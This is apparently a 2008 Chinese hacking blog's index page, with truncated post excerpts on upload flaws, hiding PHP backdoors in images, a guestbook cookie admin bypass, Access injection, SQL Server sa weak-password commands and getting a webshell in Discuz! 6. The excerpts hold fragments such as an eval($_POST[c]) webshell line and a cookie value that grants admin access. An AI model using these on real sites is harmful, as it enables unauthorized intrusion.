特洛伊剑客's Blog


特洛伊剑客's Blog


档案
日志
相册
视频

鼠标移到蜡烛人上

用搜狐小纸条开聊!


鼠标移到蜡烛人上

用搜狐小纸条开聊!

特洛伊剑客剑客行→★★打击国外反动势力 捍卫中华网络安全★★


    • 主页

    • 我的博客

    • 给我留言

    • 常去的地方

    • 视频

添加到我的博客


最近访客


春运

春运


你爱音乐吗?

音乐王子个人秀


个人档案

180)this.


查看个人档案 |
加为好友


给他留言

主人档案:

Blog名称: 特洛伊剑客's Blog

主人昵称:特洛伊剑客

职业:黑客&安全

年龄:20+

爱好:黑客&安全 程序开发 数据恢复 打羽毛球 听歌

学历:大学在读

个性介绍:

负剑逍遥天地间

羽毛球规则,沽酒谈笑笑世闲。

千里孤行无留意,三尺长剑腰际横。

挥剑荡平天下恶,怒喝震塌五岳巅。

喝罢黄河东流水,卧听大漠羌笛怨。

关山月冷月如钩,身旁相伴只寒剑。

赋诗但说朔风冽,何意天山有蓝天。

平生无处觅知己,万里青山掩孤魂。

By:特洛伊剑客

点此Q我

添加到我的博客


日志分类

  • 原创文章
  • 程序开发
  • 生活琐事
  • 漏洞研究
  • 安全相关
  • 程序开发
  • 服务器类
  • 破解技术
  • 黑软探讨
  • 渗透技术
  • 业界动态
  • 入侵技巧
  • 免杀技术
  • 读写权限
  • 跨站相关
  • 数据恢复
  • 学习相关
  • 系统优化
  • 术语解说
  • 溢出攻击
  • 乱七八糟
  • Linux学习

添加到我的博客


最新评论

  • 写的很不错写的真的很不错,就像21天成功训练营( www.*********/train )要求我们做的:行动,行动,再行动!以后我会常来你这做客的,也期待你新的作品。
  • 近来如何?我是好长时间不上网了,看到有新文,支持一下?有空一定到我的网站走走。交个朋友。。。,我们是交友网的
  • 如何?我是好长时间不上网了,看到有新文,支持一下?有空一定到我的网站走走。交个朋友。。。,我们是交友网的
  • 看了你文章深有感触~` 以后会经常来来看你~ 顺便学习下 哈~ 做个连接 www.8000hk.cn 浪浪|▍.
  • 申请连接``www.or6521.cn 狗狗'BLOG
  • 顶风哥!
  • 学习了~
  • 你好:问一个问题羽毛球 场地,您平时上网会不会有很多网址需要记忆?会不会有想找一个过去发现的好的网站而找不到的苦恼?请尝试一下新的网络产品JobIDC把喜欢的网址收藏起来这个是我的http://changqing.jobidc.com这个是注册地址:http://changqing.jobidc.com/login.aspx我的qq:304093742有问题可以联系我。请注明JobIDC
  • 好!刚一口气看完了你的文章,非常感谢你的文章!
  • 一蓑烟雨任平生欢迎真正喜欢文学,传统文化的朋友加入我的圈子!http://xicaocn.blog.sohu.com/

添加到我的博客


友情链接申请公告

要添加友情链接的朋友请注意:

欢迎各位朋友申请友情链接,本站不要求域名是否是一级域名,访问量也不限,有无LOGO无所谓。

要求:

1.不要包含色情、赌博、违法等内容。

2.站点不含垃圾信息、浮动广告、不能乱弹窗口。

3.申请链接之前请将本站先加入贵站友情链接中。

By:特洛伊剑客

添加到我的博客


日志

2008-02-18 | PHP与ASP脚本程序上传漏洞探究与防御

1:上传漏洞利用的原理只是针对form格式上传的asp和php脚本***

nc(netcat)

用于提交数据包

dos界面下运行:

nc -vv http://www.520hack.com/ 80<1.txt

-vv: 回显

&nbsp

……

[查看全文]

评论 (1) | 阅读 (6) | 固定链接 | 类别 (漏洞研究) | 发表于 13:04

提示:“固定链接”为您显示此篇文章的固定不变链接如何打羽毛球,如果您有还有疑问请点击帮助

链接地址:http://hackerkanger.blog.sohu.com/79443105.html 复制此地址

2008-02-18 | 选择MySQL还是SQL Server

对于程序开发人员而言,目前使用最流行的两种后台数据库即为MySQL and SQL Server。这两者最基本的相似之处在于数据存储和属于查询系统。你可以使用SQL来访问这两种数据库的数据,因为它们都支持ANSI-SQL。还有,这两种数据库系统都支持二进制关键词和关键索引,这就大大地加快了查询速度。同时,二者也都提供支持XML的各种格式。

  除了在显而易见的软件价格上的区别之外,这两个产品还有什么明显的区别吗?在这二者之间你是如何选择的?让我们看看这两个产品的主要的不同之处,包括发行费用,性能以及它们的安全性。

  根本的区别是它们遵循的基本原则

  二者所遵循的基本原则是它们的主要区别:开放vs保守。SQL服务器的狭隘的,保守的存储引擎与MySQL服务器的可扩展,开放的存储引擎绝然不同。虽然你可以使用SQL服务器的Sybase引擎,但MySQL能够提供更多种的选择,如MyISAM, Heap, InnoDB, and Berkeley DB。MySQL不完全支持陌生的关键词,所以它比SQL服务器要少一些相关的数据库。同时,MySQL也

……

[查看全文]

评论 (0) | 阅读 (1) | 固定链接 | 类别 (安全相关) | 发表于 13:03

提示:“固定链接”为您显示此篇文章的固定不变链接,如果您有还有疑问请点击帮助

链接地址:http://hackerkanger.blog.sohu.com/79443071.html 复制此地址

2008-02-18 | 隐藏PHP文件后门的技巧

最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里,其实把一句话木马插入到PHP文件中就已经很隐蔽了,如果说硬是要放到HTML文件或图片里,就接着往下看的这篇测试报告吧。

要知道如果光把PHP语句放到图片里是无论如何也不能执行的羽毛球握拍,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。

  我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的语

……

[查看全文]

评论 (0) | 阅读 (5) | 固定链接 | 类别 (入侵技巧) | 发表于 12:57

提示:“固定链接”为您显示此篇文章的固定不变链接,如果您有还有疑问请点击帮助

链接地址:http://hackerkanger.blog.sohu.com/79442606.html 复制此地址

2008-02-18 | 安全检测时发现的一些漏洞

一、小秋个性留言本管理验证漏洞

我朋友网站上有两个留言本,一个是小秋个性留言本,一个是倾听留言本(倾听留言本的问题等一下再说)。小秋个性留言本在后台验证你是否是管理员时有漏洞,我们来看代码:

<%response.expires=0

if request.cookies("loginok")="" then

response.redirect "login.asp"

end if

%>

不用说了吧,只要cookies里的loginok值不是空你就是管理员了,而不在乎loginok到底是什么。就算loginok是千寂孤城也无所谓。所以在cookies里加上loginok=QJGC后再访问后台,你就是管理员了。并且后台的管理员回复没有过滤“<”和“>”,可以进行跨站攻击。

二、倾听留言本的漏洞

……

[查看全文]

评论 (0) | 阅读 (7) | 固定链接 | 类别 (漏洞研究) | 发表于 12:56

提示:“固定链接”为您显示此篇文章的固定不变链接,如果您有还有疑问请点击帮助

链接地址:http://hackerkanger.blog.sohu.com/79442479.html 复制此地址

2008-02-18 | 对于ACCESS跨库的一些研究

今天入侵了一个ACCESS的站,思考了一些问题,记性不好,怕忘了,记录一下:

这个站设置很变态,什么都没有,连FSO都删了,好不容易找到一个宝贵的注入,点几经周折进了后台,看到可以更改上传类型,大喜,可是怎么改也改不了,最后发现上传类型记录在config.asp里,没FSO根本改不了,Faint.....

我只能围绕这个唯一的注入点展开思考,如果是SQL那该多好,如果是SA权限那该多好,艾, YY是没用的,我还是被ACCESS少得可怜的功能阻挡住了

我望着上传类型发呆,GIF JPG RAR MDB ,Wait,看到了

……

[查看全文]

评论 (0) | 阅读 (2) | 固定链接 | 类别 (渗透技术) | 发表于 12:55

提示:“固定链接”为您显示此篇文章的固定不变链接

罗密欧的世界搜狗~清唱西湖与泥壶米芽的宝贝
,如果您有还有疑问请点击帮助

链接地址:http://hackerkanger.blog.sohu.com/79442426.html 复制此地址

2008-02-18 | 使用Dreamweaver挖掘脚本漏洞

今天在站长站上闲逛时看到了冠龙的这套程序,想想自己刚注意到这套程序的时候还是看手册上刚刚提出Cookie注入的概念羽毛球比赛视频下载,可以说这套程序对我当初学习Cookie注入帮助也是很大的,而且前一段时间还爆出了跨站漏洞,不知道这套系统还有没有什么有意思的漏洞没有被我们挖掘出来,所以便下载了这套程序检测一下,版本是冠龙科技企业网站管理系统V8.2。

手册在07年的12期里面有lizaib的一篇《菜鸟挖漏洞,黑战就是这么轻松》的文章,看了这篇文章我也学到了不少知识,相信对像我这样的小菜黑友们应该是有很大的帮助的!这里我也给大家介绍一下我的方法,这个技巧也是曾经在别的朋友那里学来的,就是使用Dreamweaver了!我们知道Dreamweaver可以对单个文档或文件夹下的文件进行关键字的搜索,那么

……

[查看全文]

评论 (0) | 阅读 (0) | 固定链接 | 类别 (漏洞研究) | 发表于 12:51

提示:“固定链接”为您显示此篇文章的固定不变链接,如果您有还有疑问请点击帮助

链接地址:http://hackerkanger.blog.sohu.com/79442141.html 复制此地址

2008-02-18 | 利用SQL分离器实现sa弱口令强行入侵

下面这些命令要SQL分离器才能实现,下面是一些关于sa弱口令相关命令。

注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。

一.更改sa口令方法:

用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'

(提示:慎用!)

二.简单修补sa弱口令:

方法1:查询分离器连接后执行:

if exists (select * from

dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

OBJECTPROPERTY(id, N'IsExtendedProc') =&nb

……

[查看全文]

评论 (0) | 阅读 (1) | 固定链接 | 类别 (入侵技巧) | 发表于 12:51

提示:“固定链接”为您显示此篇文章的固定不变链接08全英羽毛球公开赛,如果您有还有疑问请点击帮助

链接地址:http://hackerkanger.blog.sohu.com/79442099.html 复制此地址

2008-02-18 | Discuz! 6 后台拿Shell的方法

作者:Ryat (l… 文章来源:邪恶八进制信息安全团队

如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)

1.后台编辑customfaq(customfaq.lang.php文件)

在<?的后面加上

复制内容到剪贴板

代码:

eval($_POST[c]);

2.后台编辑misc(misc.lang.php文件)

把post_reply_quote对应的内容改为

复制内容到剪贴板

代码:

……

[查看全文]

评论 (0) | 阅读 (1) | 固定链接 | 类别 (渗透技术) | 发表于 12:50

提示:“固定链接”为您显示此篇文章的固定不变链接,如果您有还有疑问请点击帮助

链接地址:http://hackerkanger.blog.sohu.com/79442056.html 复制此地址

2008-02-18 |